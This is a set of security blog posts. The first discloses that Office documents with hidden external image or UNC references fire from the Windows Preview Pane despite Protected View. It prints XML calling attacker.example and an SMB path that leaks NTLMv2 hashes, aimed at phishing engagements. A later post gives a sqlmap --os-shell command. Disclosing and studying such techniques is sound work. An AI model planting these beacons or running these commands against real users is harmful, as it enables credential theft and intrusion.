November 26, 2019

Getting Malicious Office Documents to Fire Without Protected View

Intro


I wanted to share an interesting behavior I discovered with Microsoft Office documents on a fully patched Windows 10 operating system with an up-to-date local installation of MS Office 365. I've been doing a lot of development work lately on my phishing tool, PhishAPI, and more or less stumbled across this new technique. I have reported it to Microsoft.

I'm writing this blog post in order to hopefully shed some light on the risk this issue introduces and to assist with white-hat phishing techniques. Most savvy users know better than to click out of "Protected View" mode when opening remote Office documents, although that lure still works well to this day on the less aware. The result can be captured information such as an IP address, action timestamps, OS/Office version disclosures, and perhaps the biggest, NTLMv2 hash leaks!

Some Background


The technique of embedding invisible HTTP and UNC calls in Microsoft Office documents is not a new one and has been around for some time now.  As most of you probably know already, newer Office files such as Word documents (docx) are essentially compressed archives containing XML data.  To see this for yourself, simply open a docx file in your favorite archive tool or rename it to .zip and open it directly to see the contents.


Within these archives are resources such as the images in the Word document, as well as XML files which reference their locations.  External images can be used as well, which is where HTTP calls come in.  By referencing an external URI instead of a physical path within the document itself, you can make Word gladly call out over the Internet to retrieve it.  You can also make this an invisible image so it's not seen in the document viewer itself.  A quick and easy technique used by red teams is to set up a netcat listener to wait for the call, something like `nc -lv 0.0.0.0 80`.  With some basic logging they can see the source IP which requested the resource and know when the connection occurred.

With PhishAPI, I took things a step further by automating the XML creation for new documents, as well as inserting a hook into existing documents the user can upload through a web interface.  This way you never have to touch the XML or open up a Word document to weaponize it, and everything can be done quickly and easily.  I wrote another blog about that process if you'd like to read it.  Essentially, PhishAPI works as a web service to listen for these requests and captures IP addresses, user-agent information, credentials (like Phishery, by using basic-auth), and hashes if it's an SMB request via the UNC call (thanks to Responder in the background!).  It does a lot of other things too, such as cloning fake portals, but that's outside of the scope of this discussion.  When it receives a request, it looks up a GUID in a database to relate the request to a specific phishing campaign and target, then alerts via a specified Slack channel so the "attacker" can be notified in real-time.  Enough about PhishAPI though; this is roughly what the XML would look like in the Word document if you were to do something like this manually:
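(The original post showed a screenshot here.  As a rough reconstruction, with the relationship IDs and tracking URL below being placeholders rather than PhishAPI's actual output, the interesting piece lives in word/_rels/document.xml.rels, where an image relationship can be marked as external:)

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <!-- A normal, embedded image: Target is a path inside the archive -->
  <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
  <!-- An external reference: Word calls out to this URL when rendering the document -->
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://attacker.example/landing/YOUR-GUID-HERE" TargetMode="External"/>
</Relationships>
```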


To mitigate this, Microsoft added something called "Protected View" to the Office suite back in Office 2010.  Everyone's probably familiar with this little yellow ribbon at the top of your documents which you have to "Enable" in order to make changes or run dynamic content.  This is Microsoft's way of protecting the average user who just wants to view a remote document without needing to run macros and other dynamic/remote content.  There's actually a flag (the "Mark of the Web") which gets set when the document originates from somewhere other than your workstation, and it's what enables Protected View.  Once you manually override Protected View, the flag gets cleared and you will not be prompted again for that document.  You're essentially marking this document as safe and can move on.  You can also universally disable the setting in Word, but that's not recommended and isn't a default, so not many users would be susceptible.
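If you're curious, you can inspect this flag yourself: on NTFS it lives in a "Zone.Identifier" alternate data stream attached to the file.  Here's a minimal sketch in Python (the path is a placeholder; this assumes Windows and a file that was downloaded from the Internet):

```python
# Read the Mark of the Web from a downloaded document.
# NTFS alternate data streams are addressed as "filename:streamname".
with open(r"C:\Users\victim\Downloads\Invoice.docx:Zone.Identifier") as ads:
    print(ads.read())

# Typical output:
#   [ZoneTransfer]
#   ZoneId=3        (3 = Internet zone, which is what triggers Protected View)
```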


If you don't supply your own document to PhishAPI, it uses this as a default template in an attempt to fool users into clicking "Enable Editing" on their own.  I know, dirty!  However, if they just view the document and do not bypass Protected View on their own, the call will never make it to the PhishAPI server and I won't receive any notification that the user even opened it.  Bummer!

The Discovery


I used PhishAPI to generate a new document using the default template as I had done many times before.  This was for a current social engineering engagement we were performing for a client.  I downloaded the Word doc, browsed out to the location using Windows File Explorer, and sent it to a co-worker so they could have some Phishing fun in our Slack channel.  I was surprised to see the document had already fired off an alert, knowing that this was a newly created document from the Internet and would have had the Protected View flag still set.  I never opened it!  


I quickly realized that was the case due to my use of the "Preview Pane" in File Explorer on Windows 10.  Just highlighting the document caused the internal payload to execute in the context of my user account on Windows.  With it being a "preview", there was no "Protected View" ribbon to display.  This was interesting to me because my assumption was that, by default, the preview version of the document (both handled by Microsoft) would simply not render dynamic or remote content.


You can see in the above image that I still received the Slack notification even though this document had yet to be opened.  The preview did not clear the flag from the document, however, because when I opened it in Word I was still prompted and it did not fire the payload.

Okay, so HTTP requests are one thing, but can SMB requests initiated from UNC calls still leak an NTLMv2 hash from my user account?  You bet!  I fired up a local instance of Responder to listen on TCP 445/139, and even though "Protected View" was still set, I received my own hash on the local network.  Yikes!
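For reference, the UNC variant looks nearly identical to the HTTP one.  Pointing the external target at an SMB path (a sketch; the host and relationship ID below are placeholders) is enough to make Word negotiate NTLM authentication with the listener:

```xml
<Relationship Id="rId6"
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
  Target="file://192.0.2.10/share/image1.png" TargetMode="External"/>
```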


Lastly, another thing I noticed is that O365 for web (in a web browser) renders the document without Protected View as well, and causes at least the HTTP payload to fire.  This is nice if your target is using O365 and you want to collect those Phishing statistics and know if they opened your email.  During my research I wasn't able to get SMB to fire there the way it does with the Preview Pane bypass.  I also noticed the plaintext credential technique does not work here or locally, because the preview functionality does not prompt for basic-auth when the server responds with a 401 status code.

So the Preview Pane might not always be enabled on your victim's workstation, but that's okay!  I've noticed that the major web browsers (at least Firefox and Chrome) enable previews by default when you're uploading a file to a web site.  The following screenshots are from after I disabled the Preview Pane in File Explorer and uploaded a file via Firefox and Chrome (Slack).  You can see the call in the background of the second image.

Firefox "File Upload" with Default Preview Pane

Chrome "Open" with Default Preview Pane

Conclusion


So what's the big deal? Well, for one, if you were crafty with your phishing campaign and you wanted to gather leaked information and hashes, you could probably prompt for an upload on your site to trigger the payload, for example. For another, there's a big false sense of security users have when dealing with malicious documents (maldocs). They assume as long as they don't open the file, or they open it but do not accept any prompts, they're completely safe. However, as I've just demonstrated, if the file merely exists on their file system, the payload is likely to be triggered eventually when the victim is browsing their files at a later time. Perhaps they want to select it to send it to the Recycle Bin. This likely explains why a number of my phishing campaigns did not trigger initially but did several months after the campaign had ended, resulting in crackable NTLMv2 hashes.
I've sent this to Microsoft's MSRC team as a potential bypass technique for Office's "Protected View". Unfortunately, after a couple of weeks of waiting for a response, they acknowledged this is in fact an issue they plan to address in the future, but they will not be awarding me a bounty and plan to offer no further updates. That's bad news for me, but great news for anyone who plans to leverage this for red teams, since there's unlikely to be a fix anytime soon. Here's the quote:

“Our engineering team(s) determined that a fix for this issue does not meet our criteria for immediate security servicing. However it is a candidate for consideration for potential improvements in a future version of this product or service. At this time, we will not be providing ongoing updates of the status, or if there will be a fix for this issue, and we have closed this case.

Your report is not acknowledged as a security vulnerability by Microsoft. While all security vulnerabilities are bugs not all bugs are security vulnerabilities that meet the criteria for immediate security servicing.”

Although it doesn't entirely bypass the security feature within the suite itself, I think there's still an issue here that exposes users to the risk of stolen credentials or leaked sensitive information at the very least. In fact, I believe it's more severe than a direct bypass since you don't even have to open the file; you simply have to select it. I hope this blog helps to highlight this risk for users and gives white-hat red teams another vector when Phishing. Hopefully, it will be resolved, as I do believe the default should be to not render dynamic or external content. Stay safe out there!

October 22, 2019

Bugs Wanted Dead or Alive - A New Approach to Responsible Disclosure for All


"What's all the hubbub, bub?"


In this blog I'd like to talk to you about hunting bugs in your environment.  After all, a large part of proactive security is all about finding and eliminating bugs before your adversary can leverage them against you.  It's not a point-in-time task; it's a constant battle due to new issues which can surface at any time.  We're in an ongoing bug-squashing frenzy for the foreseeable future, and the outlaws can weaponize and script exploitation of these bugs in near-real time.  It's the wild-wild west out there, folks!  After this you'll be the "hootin'est, tootin'est, shootin'est, bob-tail wildcat, in the west!"



No matter who you are or what your organization's security maturity level is, there's always room for improvement.  I also want to discuss responsible disclosure in the form of Vulnerability Disclosure Programs (VDPs), their current limitations, and propose a potential solution for a simple and standardized approach that everyone can adopt, no matter how small or large your business is.

Check Your Posture


Honestly, How Many People Just Sat Up Straighter in Their Chairs?

Depending on the security maturity level of your organization, you have some options when it comes to squashing bugs.  Maybe your security posture is hardened and you're ready to participate in a bug bounty program or red team assessment.  Perhaps you're just getting started and need to begin with vulnerability scans or penetration testing first.  Wherever you are, you have options to continue strengthening that posture, and we'll discuss the pros and cons of each.  The end goal is the same either way: we want to exterminate these bugs first!

A common pitfall I see is when a client wants to put the proverbial cart before the horse.  They've never done a penetration test before but they want to go "all in" and start with an advanced Red Team.  Don't get me wrong, it's wonderful that they're ready to take this on and start taking security vulnerabilities seriously.  However, I don't think there's a lot of value in running before you can walk.  There may be more value in starting with something like a vulnerability scan in order to eliminate the low-hanging fruit before simulating a nation-state attacker.  In my opinion a red team should be leveraged to test the defenses of an organization after they feel like they've fortified their environment as best they can.  They're seeing how they hold up against the storm and how good their defenses are at identifying and stopping potential threats.  Otherwise it's like shooting fish in a barrel; the tester may not have to try very hard, and other techniques that may be available to an attacker never come to light.  Tired of these metaphors yet?  😃


"Say your prayers, Varmint!"


  • Vulnerability Scanning
Everyone should be doing some level of External and Internal vulnerability scanning on a recurring schedule.  This is the easiest way to identify bugs and prevent scripted and other non-targeted attacks against your assets.  It's also a good way to verify that your patch management process is working properly (you are patching, right?).  Lastly, there's the added benefit of catching configuration mistakes and keeping change management in check.

There are a couple of different types of vulnerability scanning, but we typically talk about scanning networks and web applications.  This can be unauthenticated or authenticated for either, or in the case of AppSec, Dynamic or Static (code analysis).  If internal resources are limited, you can have this managed for you as a service, or, if budget is a problem, you may opt to have your own scanner in-house.  Either way, this is something everyone should be doing, whether they're Swiss cheese or Fort Knox.
  • Penetration Testing
I have to say this again: Penetration Testing is not the same as Vulnerability Scanning.  Pentesting expands upon the discovery of vulnerabilities by actively exploiting them in order to gain access to the environment and sensitive data within.  Many tools and manual methodologies are used that are not part of a typical vulnerability scan.  Most organizations today perform pentesting at least once a year in addition to regular vulnerability scanning.
  • Red Team
Red teaming expands upon penetration testing by simulating a real-world targeted attack against your organization.  Oftentimes there is more time allocated for Open Source Intelligence (OSINT) and reconnaissance, as well as Social Engineering.  Less information is given up front by the client and the engagement is very much a black-box approach.
  • Bug Bounty
If you've been doing the above for a while and you're confident in your stance, you may be ready for a bug bounty program to see how you hold up against a larger attack surface.  There are private programs for those who want to test the waters and control the testing process, as well as public programs for those who are ready to open up the flood gates to everyone.  There are some pros and cons involved with bug bounties, which I'll touch on briefly.

The benefits are pretty obvious, I think.  If done properly, bug bounties can be more effective at uncovering bugs and cost less than a traditional red team or pentest engagement.  With a larger talent pool of bug hunters who are financially motivated, they are likely to find things which may otherwise not be found within the constraints of a normal pentest.  I know from personal experience: I've found bugs in software prior to the vendor having a bug bounty program, and years later when I revisited, the issues had been resolved.  Private programs can also enforce a non-disclosure agreement (NDA), which limits bad publicity when a bug is discovered.

However, if done improperly or before you're ready, it can be much more costly depending on the reward system agreed upon and how public your program is.  Also, on the opposite side of the same coin, with a larger talent pool you're likely to have many more inexperienced people testing your resources.  This can be a problem if they ignore or fail to follow your scope or testing guidelines, and it can negatively impact your availability.  It's also a full-time job for someone to respond to and vet submissions.  Reports can vary from tester to tester and many do not qualify as actionable security issues.  Another thing I've noticed is that an inexperienced tester may find a low-hanging vulnerability such as Cross-Site Scripting (XSS) but lack the knowledge and experience to know that it may be chained together with another vulnerability to further the attack.  You may respond to and fix this one issue only to miss the bigger risk if it were to show up elsewhere.
  • Responsible Disclosure / Vulnerability Disclosure Program (VDP)
Finally, the main point of this blog!  Do you (yes, you!) have a VDP?  In short, a VDP is a program or policy that makes it clear and easy for a third party or researcher to follow your preferred process for disclosing a vulnerability to you.  Let me be clear.. you WANT to encourage this.  As a vendor, white hat researchers will likely come across issues over time and you want them to report them to you before the black hats find them (they will!).  You don't have to pay monetary rewards, but that's just more incentive to report if you can swing it.  Even without it, you'll hopefully have people responsibly disclosing bugs just to do the right thing, even though it may come with some personal risk to themselves.  You're getting free security consultation!

History is filled with examples of responsible disclosure attempts that were handled poorly by vendors, with trust between vendors and researchers lost in the process.  Mostly due to a lack of understanding, or from bad experiences where it wasn't handled well, vendors often feel threatened or even blackmailed by requests for rewards in exchange for proof-of-concepts (PoCs).  Researchers have been prosecuted as a result of "hacking" without permission, and the scene has been an ugly one for some time, with the community essentially all but giving up on responsible disclosure.  It's hard to fault a researcher for taking a (sometimes great) personal risk for little or no reward just because they want to do the right thing.

I personally have disclosed dozens of bugs to vendors and open source tools because I believe it helps make the Internet a safer place for everyone.  Corny, I know.. but I genuinely feel passionate about this.  Sometimes, selfishly, the severity of the bug has the potential to impact my own information sitting in a database, and I have a personal motivation to help resolve the issue.  I'll often spend a lot of time sifting through social media, "about us" sections of the website, and various other sources to find the best security contact to report the issue to.  I'll also check to see if they have a current bug bounty.  If they do not, more often than not I'll take the time to draft up a report and send it via a third party like US-CERT, or I'll send it anonymously from a disposable email account over a VPN so it can't be easily traced back to me.  This is sad, because it makes me feel like a criminal when all I want to do is help.  I'll often get asked by other white hats what to do when they stumble across something like this.  I typically ask, "Well, are you hoping to get something out of this?  How did you discover it?"  I try to make them think through the risk versus the potential reward.  Oftentimes they determine it's just not worth taking the risk at all, which does no one a service in the end.  All because there isn't enough information to determine how the company will respond.  Sometimes companies are grateful and understand the benefit, while other times they act defensively.

So what's the solution?  In my opinion, EVERYONE should have a VDP in place, no matter how small or large the organization.  The VDP has to be easy to find, contain clear and concise information, make things quick and easy for the researcher, and most importantly, reassure the researcher that they will not be prosecuted for reporting issues in good faith.  This last point is called a "Safe Harbor" clause.  Also notice how I said "quick and easy", which is key when you want to encourage responsible disclosure, especially when there's no financial incentive for researchers to report bugs.  If you make it difficult to locate the specifics of the VDP, such as the primary point of contact, or researchers feel like there's a risk of being prosecuted, the likelihood of responsible disclosure will be low.  This means the bug will remain until someone else finds it, which could mean a breach for you.

The trouble with VDPs today is that hardly anyone implements them.  NIST only recently, in 2018, incorporated language about them into their Cybersecurity Framework, and speaking with my Compliance team internally, they have yet to run into a client where they've helped implement or review one.  In fact, according to HackerOne, 93% of the businesses on the Forbes Global 2000 list did not have a VDP.  I personally believe one of the reasons for this is the lack of standardization.  The National Telecommunications and Information Administration (NTIA) has a template, which is a wonderful effort, but there are no guidelines on where to store it consistently on each site and it's a lot to read through for any researcher.  We need something better, which leads me to an idea I have and a concept of what the future could look like in an ideal world.  In short, I'm hoping to create a movement which can be easily adopted by all in order to make the Internet a safer place by encouraging (not discouraging) responsible disclosure.



Well, as a researcher I want a place I can go to know for sure whether there's a VDP in place, and as a former administrator I would want to be able to implement one easily.  If a VDP is in place, I want to quickly determine if they have a safe harbor promise and who the primary contact is for reporting security issues.  I also want an easy way to report, because in all honesty, if I have to spend a lot of my free time building PoC videos and custom documentation it may not be worth my time.

As I think about the problem and potential standardization and automated solutions, some ideas come to mind.  An email distribution could be adopted by everyone, such as security@org.com, but that would be difficult to keep consistent and you would have to inquire about such a program first.  Likewise, you could try to get everyone to reserve "/vdp" as an application path or subdomain to place the VDP policy in, but that's not always practical and can't easily be parsed.  What may work is a centralized, non-profit database which acts as a central authority for everyone.  However, you run into issues with trust, maintenance, and ownership, and things get complicated quickly.

As I thought more about this, I couldn't help but reflect on robots.txt files in the root directory of web servers.  As most of you are already aware, a robots.txt file is a plain text file which is meant for search engine bots to parse in order to know which contents of a web site should be spidered or not.  It's not seen by your typical user unless that user is technical and wants to view the contents.  Go ahead, head on over to https://medium.com/robots.txt to see what I mean.  I believe this same approach can be adopted for VDP use.  Something as simple as a file named vdp.txt can be placed alongside robots.txt and could be in a format that's both human readable and parsable by a script, such as YAML, XML, or JSON.  The information contained within could be used by vulnerability scanners to make automatic reporting of new issues a breeze for researchers.  See an example I created below:

vdp.txt
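(The original example was an image; below is a rough YAML-style sketch of what such a file might contain.  The field names are illustrative, not a finalized spec.)

```yaml
# vdp.txt - machine-readable Vulnerability Disclosure Policy (illustrative)
policy: https://example.com/security/vdp.html   # optional rich HTML policy page
contact:
  email: security@example.com
  proxy: US-CERT          # acceptable third-party reporting channel
safe-harbor: true         # good-faith researchers will not be prosecuted
scope:
  - "*.example.com"
out-of-scope-issues:
  - clickjacking
  - self-xss
rewards: none             # or a link to the bug bounty program
```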

If the organization also wants to adopt a rich HTML page for their disclosure policy, they can reference it here for more information.  They can also specify things such as scope, which issues are not included (for the scanners to reference), contact methods and their recipients, the safe harbor promise, and other requests and rewards for the program.  Vulnerability scanners such as Burp Suite Professional and Nessus, to name a couple, could parse this information automatically based on the in-scope domain and display reporting functionality for organizations with a VDP.  It can also be specific to issues which are in scope and haven't previously been reported through known CVEs.
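As a minimal sketch of how a tool might consume such a file (this assumes the YAML example above, the third-party requests and PyYAML libraries, and a placeholder domain):

```python
import requests  # pip install requests
import yaml      # pip install pyyaml

def fetch_vdp(domain):
    """Fetch and parse a vdp.txt sitting alongside robots.txt, if one exists."""
    resp = requests.get(f"https://{domain}/vdp.txt", timeout=10)
    if resp.status_code != 200:
        return None  # no VDP advertised
    return yaml.safe_load(resp.text)

vdp = fetch_vdp("example.com")
if vdp and vdp.get("safe-harbor"):
    print(f"Safe harbor promised; report to {vdp['contact']['email']}")
```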

Burp Suite Professional - Reporting VDP Concept

Nessus - Reporting VDP Concept

The idea here is that if the target has a VDP and both the bug and resource are in-scope, a "Report Issues" tab could be adopted by vulnerability scanners to make bug reporting easy.  In fact, I'm working on a Burp Suite Extender plugin right now to do just this, which anyone can add.  One button may allow a customized email with an attached HTML report to be composed by pulling in contact information for the researcher and the target's point of contact.  Another button could report through a third party proxy, such as US-CERT, and another could automate and send a basic report without any user interaction.  Finally, the last option could be to simply parse and display the target's VDP policy without ever leaving the testing tool of choice.
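For anyone curious what the bones of such an extension look like, here's a bare-bones sketch in Python (Jython, which Burp's Extender API supports).  This is only an illustrative starting point, not the actual plugin:

```python
# Minimal Burp Extender skeleton that adds a "Report Issues" style tab.
from burp import IBurpExtender, ITab
from javax.swing import JPanel, JButton

class BurpExtender(IBurpExtender, ITab):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        callbacks.setExtensionName("VDP Reporter (concept)")
        self._panel = JPanel()
        # Button wiring (fetching/parsing the target's vdp.txt) omitted here.
        self._panel.add(JButton("Parse target's vdp.txt"))
        callbacks.addSuiteTab(self)

    def getTabCaption(self):
        return "Report Issues"

    def getUiComponent(self):
        return self._panel
```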

"Th-th-th-that's all, folks!"

Let's Squash Some Bugs!

I'm not saying my solution is the only one, and I'm sure other people have had better ideas.  However, I haven't seen anything to date and I'm hoping to ignite the discussion and inspire something like this to happen.  I'm hoping to finalize my vdp.txt template and Burp plugin soon and share them on my GitHub account so anyone can improve upon and implement them within minutes.  I'd love to see a movement like this take off across the Internet even if it's not my method.  My point in this entire article is simply that the VDP is a great idea but it's broken in its current state.  We need to encourage responsible disclosure in order to squash bugs, and we need to make it easy and safe for the researchers and for organizations or it won't happen.  Thanks for tuning in.  Until next time!

September 01, 2019

Vulnerability Remediation - Fight for the Users


Off the Grid

When you're zooming by on your light cycle looking through your most recent vulnerability assessment or penetration testing results, I challenge you to be more like Tron and fight for your users.  He's a security program, after all!  What I mean is that organizations are typically focused on the vulnerabilities that directly affect their environment, and understandably so.  We still have a tendency today to think of our networks as a castle with a strong perimeter to keep us safe from the chaos of the Internet.  It's amazing to me how often customers will approach the task of remediation from the mindset of protecting only their hosts and services from a direct attack.  Vulnerabilities that affect the customers (users) of that organization are not just deprioritized, they're oftentimes flat-out ignored.  It's true that most vulnerabilities that affect the users have a lower severity and shouldn't be prioritized over something like Remote Code Execution (RCE) on a server with a Critical severity, but they also shouldn't be downplayed.  Oftentimes it feels like the likelihood of attack for some of these is far off, or maybe it doesn't seem like a concern because the attack would have to occur off of your network (external MITM), but they could still pose a serious risk to the organization if exploited by a dedicated adversary.

Like This Guy! (Master Control Program)


I'll Clu You In

A common example of a vulnerability that affects a user may be one that's carried out by a Man-in-the-Middle (MITM) attack.  Take, for example, an SSL/TLS Downgrade or Weak Encryption Cipher/Algorithm issue.  These are common in vulnerability reports due to the number of encrypted web services available on external and internal environments and the rate at which ciphers, algorithms, and certificates become outdated and are no longer strong or valid.  When a customer sees these, I can almost hear the eyes rolling from over the speaker phone.  Perhaps they start out sounding concerned, "Is this like Heartbleed?  Can they capture leaky data from the server?"  To which I reply, "Well, no.. but if someone were positioned between a user somewhere and the server, they could potentially intercept data in cleartext."  They usually laugh at this point among themselves and make a remark about how unlikely such an event would be, especially when it's external facing only.  As I said before, even if it is less likely due to the nature of the setup for such an attack, it could potentially be devastating for a business.  Think about what kind of information is being sent to and from your external web services.  Are there credentials involved for remote administrative services?  Where else are these domain credentials leveraged externally?  Even if those services are secure, it may not matter if credentials were obtained via another vulnerable one.  Where would these credentials lead an unauthorized user?
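If you want to check your own services for this class of issue, one quick approach (among many; the host below is a placeholder) is Nmap's bundled cipher enumeration script, which lists and grades the cipher suites each TLS service offers:

```
nmap --script ssl-enum-ciphers -p 443 www.example.com
```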

I also think, from a risk perspective, they may simply not believe it's their responsibility.  They want to protect the village within the castle walls and don't really think of the users external to their environment as assets they need to help protect.  We have a tendency to put our arms around our internal systems and users.  Let's save the peasants!

Let's Like, Talk Examples, Man.. (in the voice of Jeff Bridges)

Man in the Middle (MITM)

We talked about weak encryption already, but services that offer no encryption, such as HTTP, FTP, and Telnet to name a few, do little or nothing to protect the end user and the server from traffic interception.  All of these may lead to information disclosure in the form of captured credentials, passwords, or whatever sensitive information is in use by the service, but they can also lead to the modification of the data in transit.  I'm speaking to the "Integrity" component of the CIA Triad, specifically.  This essentially means the user is on their own when attempting to determine the authenticity and integrity of the service and data they are interacting with.  They may disclose information to an attacker directly or indirectly, and they could download malware, etc.

I'm sure many of you are aware of the scenarios in which this type of attack can be pulled off.  If it's an internal system, the attacker would have to already have a foothold into the environment in question.  If this is external (on the perimeter of the target's environment) this data could be intercepted by someone sharing the same network as the victim.  This could be a public WiFi hotspot in a coffee shop or airport.

Self Signed and Expired Certs

Another example I commonly see of ways we're not doing our users any favors is in the form of self-signed or expired certificates.  Generally the attitude is, "Well, it's better that we have encryption, right?" or "I don't see the harm since the data in transit is using strong encryption ciphers."  The main problem here, in my opinion, is that we're desensitizing our users, who should be looking for warning signs.  This is the opposite of security awareness training, in that we're telling our users, "When you see this warning in your browser you should ignore it and add the exception."  Again, it also does little to provide any assurance of authenticity, that we're interacting with a trusted server like we believe we are.  If cost is an issue, consider a free Certificate Authority such as Let's Encrypt, or get a wildcard certificate for your organization and use a subdomain for these services.  This is usually such a small change for the administrative staff and a big victory for the end users.
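For what it's worth, replacing a self-signed certificate with a trusted one can be as simple as a single certbot run (a sketch, assuming an nginx server with the certbot nginx plugin installed; the hostname is a placeholder):

```
sudo certbot --nginx -d portal.example.com
```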

Insecure Handling of Sensitive Information

This category of vulnerabilities is more Application Security focused in my mind (it doesn't have to be), but deals with the transmission of sensitive information.  A few specific examples of this may be passwords that are sent over GET requests instead of POST, session tokens in the URL, and HTML form fields that do not explicitly tell the browser to ignore autocomplete for sensitive input fields such as passwords and credit cards.  These can all result in the interception of sensitive user information even if the service is properly encrypted and the user does everything right.  These are issues the development team should be aware of as they design and build the application.
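As a small illustration of that last form-field example (hypothetical markup; note that modern browsers may still override autocomplete for saved passwords):

```html
<!-- Send credentials in the request body (POST), never in the query string -->
<form action="/login" method="post">
  <input type="text" name="username">
  <!-- Ask the browser not to store or autofill this sensitive field -->
  <input type="password" name="password" autocomplete="off">
  <button type="submit">Sign in</button>
</form>
```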

Session Issues

Here's another AppSec category that describes issues which put the user of the application at risk.  I'm referring to session issues such as broken session termination, overly long or non-existent timeouts, and fixation vulnerabilities.  Like most of these examples this may not leave the application itself open to a direct takeover, but indirectly exposes the users to risk that could then lead to something more serious for the organization.  For example, remote attackers may be able to hijack a user's session and use their new vantage point to look for post-authentication vulnerabilities that may be inaccessible without credentials.  Or, maybe depending on the user, such as an admin, they can do a lot under the context of that hijacked account.  Another example may be malware on a victim's machine that allows someone to jump into an active session because it never expired or logged out successfully.  I've done this personally on many red team engagements thanks to people leaving their browser tabs open and logged in, with the application not having a care in the world. 
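Session lifetime and termination have to be enforced server-side, but defensive cookie attributes also raise the bar for the hijacking scenarios above.  A hardened session cookie might look something like this (illustrative values):

```
Set-Cookie: SESSIONID=opaque-random-value; Secure; HttpOnly; SameSite=Strict; Path=/; Max-Age=900
```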

Third Party Client Vulnerabilities 

The final example I'll use to help make my point relates to third party patching issues, which I see a lot of.  Now, these users are typically internal users, but they could be external customers if you design software.  Not only do I see this finding a lot during most assessments we perform, I don't see it resolved at the same rate that missing Operating System patches are applied.  For one thing, it's not built directly into the update process by default, so third party applications are inherently more difficult to keep up to date.  That, and if you allow your users to install their own software (DON'T OR YOU'LL BE DEREZZED!), managing the inventory becomes very difficult.  Programs such as Ninite, SCCM, and others can help keep these applications up to date.

Users use.. applications such as their browser, Adobe Reader, Flash (is this still a thing?), Java (is this still a thing?), and others in order to perform their daily job responsibilities.  However, leaving these applications unpatched could open your users up to a watering-hole or drive-by download attack.  Maybe they are phished and open a PDF but they "didn't click on anything".  They may be compromised and in turn expose the organization to a breach by means of lateral movement and escalation.


End of Line

Users are often a cause of frustration for us when it comes to security, so there's a bit of a stigma that comes with supporting them.  (ID10T!)  Whether it's in the form of a phishing victim, accidentally installed malware, a configuration mistake, or some other user error, there's only so much we as security professionals can do to lower the risk.  For the things outside of our influence, we try to correct behaviors with security awareness, secure code development, and internal social engineering training.  However, if we can proactively help our users by taking steps to secure the back end systems we do have control over, no matter how small the risk may seem, each "fix" will be another cumulative brick in our walls to help protect the environment.

Thanks all!  Stay in the game!

"Greetings. The Master Control Program has chosen you to serve your system on the Game Grid. Those of you who continue to profess a belief in the Users will receive the standard substandard training, which will result in your eventual elimination."

June 25, 2019

One-Two Punch: Using AppSec to Up Your Pentests and Phishing Gigs


Let's Get Ready to Rumble!


In this corner, we have the previous InfoSec champion of the world, penetration testing.  Pentesting is no stranger in the Cybersecurity space.  In the other corner, and also popular, dynamic application security testing.  These are not the same, but have you considered using AppSec to enhance your existing penetration testing and phishing engagements?  Instead of viewing these consulting services as distinct, isolated components, AppSec can be a great multiplier when teamed up with pentesting/red teaming and phishing.  The result is a more comprehensive, holistic view of the environment, and it can lead to better results in the other red team activities.

I'm writing this blog because it's not always obvious to pentesters, and I often find critical web vulnerabilities that were missed by other teams.  AppSec seems to be the path less traveled, especially when the engagement isn't sold specifically as a static or dynamic application security gig.  The client is expecting that punch to the head, the vulnerability scan and the Man-in-the-Middle attack.  They're not expecting that left hook, the external command injection vulnerability on their HR server.  It can be the difference between a knockout (KO) and a technical knockout (TKO) report for the client.  Just ask King Hippo.


Round 1: Penetration Testing & Red Team (Physical)


Fortunately for you, dear reader, I decided not to go into full-on story mode with this blog.  I'll cite some examples at a high level that I've experienced personally, but for the most part I'll keep it short and simple.  There are multiple instances I've experienced while doing either penetration testing or red team activities where AppSec made the difference between a successful engagement and a so-so one.  You might be thinking, "Well, my vulnerability scanners support application testing."  True, but they typically aren't very comprehensive.  Sorry, they just aren't.  (Looking at you, Tenable!)

Traditional Penetration Testing

The issues below are just some examples of web findings I've come across that aided with my penetration tests in the past:

  • SQL Injection (SQLi)
  • Local File Include (LFI)
  • Server Side Request Forgery (SSRF)
  • Unrestricted File Uploads (Web Shells, Hashes, etc)
  • Misconfigured Web Services / Information Disclosure (Directory Listing, Verbose Error Messages, etc)

I was once doing a pentest for a new client who was big on rotating their security vendors annually.  Although I support having a fresh set of eyes working on your environment each time, I think there's some value in security professionals knowing your network and business.  As a manager I strongly believed in rotating the lead internally for each recurring engagement.  I digress..

This one particular environment was somewhat mature from a security perspective and had regular vulnerability scanning and penetration testing performed on its external perimeter.  Not surprisingly, I wasn't able to find anything worthwhile to leverage in order to gain access to the internal environment, and my go-to (phishing) wasn't in scope.  Instead, I used the leftover time I had available to do some application security testing in Burp Suite Professional.  Using my nmap/Nessus host and service discovery results, I sucked the web services into Burp's sitemap and started testing.  It wasn't long until I found unauthenticated SQL injection with os-shell access.  The service was running as an elevated account, so from here it was an easy win from an internal testing perspective.
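For those unfamiliar, "os-shell" here refers to sqlmap's ability to escalate a SQL injection into operating system command execution.  A run along these lines is the typical route (the URL is hypothetical, and this assumes the database user has sufficient privileges):

```
sqlmap -u "https://hr.example.com/search.php?q=test" --batch --os-shell
```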

Had the web applications been tested by the prior security firm, this wouldn't have happened and I would likely have struggled to find any worthwhile results during the engagement.  I've seen the same thing with LFI for gaining access to credentials, SSRF to access sensitive internal systems that aren't exposed publicly, unrestricted file uploads leading to web shells and NTLMv2 hash leaks, and misconfigured web services resulting in sensitive information disclosure by means of directory listing and verbose error messages.  I've also seen directory listings that exposed SQL backup files and .htaccess files with credentials or hashes in them.  I'm sure I'm not alone here..

Red Team / Physical Penetration Testing / Physical Social Engineering

These engagements can be really fun.  Typically there's a lot of recon and planning that goes on prior to an on-site activity.  Here are just a few of the things I've seen via web applications that could come in really handy during a red team engagement:

  • Physical Access Control Systems (Default or Weak Credentials, Auth Bypass, etc)
  • Access and Control of Camera / Security Systems
  • Access Codes for Doors / Badges
  • Building and Cubicle Diagrams

As you can imagine, having someone on your team who can give you access to the facilities while you're physically on-site doing a red team can come in really handy.  A remote teammate, or even you yourself with an Internet-connected device, could remotely open garage doors, unlock interior doors, and disable the cameras to go undetected, Mission Impossible style!  I've accessed building codes and cubicle layouts just from unauthenticated directory listing vulns on publicly facing web servers before!

Tools

